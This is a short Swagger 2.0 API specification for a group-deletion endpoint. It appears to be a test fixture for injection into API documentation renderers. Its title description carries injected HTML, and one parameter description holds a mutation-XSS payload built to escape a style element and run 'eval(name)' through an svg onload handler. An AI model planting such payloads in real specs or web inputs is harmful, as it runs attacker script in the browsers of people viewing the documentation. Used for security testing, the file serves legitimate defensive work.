swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <h1>DVA Injected Code</h1><a href="https://www.example.com">Example Link DVA</a>

  version: production
basePath: /DVA/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <svg></p><style><a id="</style><svg/onload=eval(name)>">

          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteGroupById
      summary: Deletes a group by id
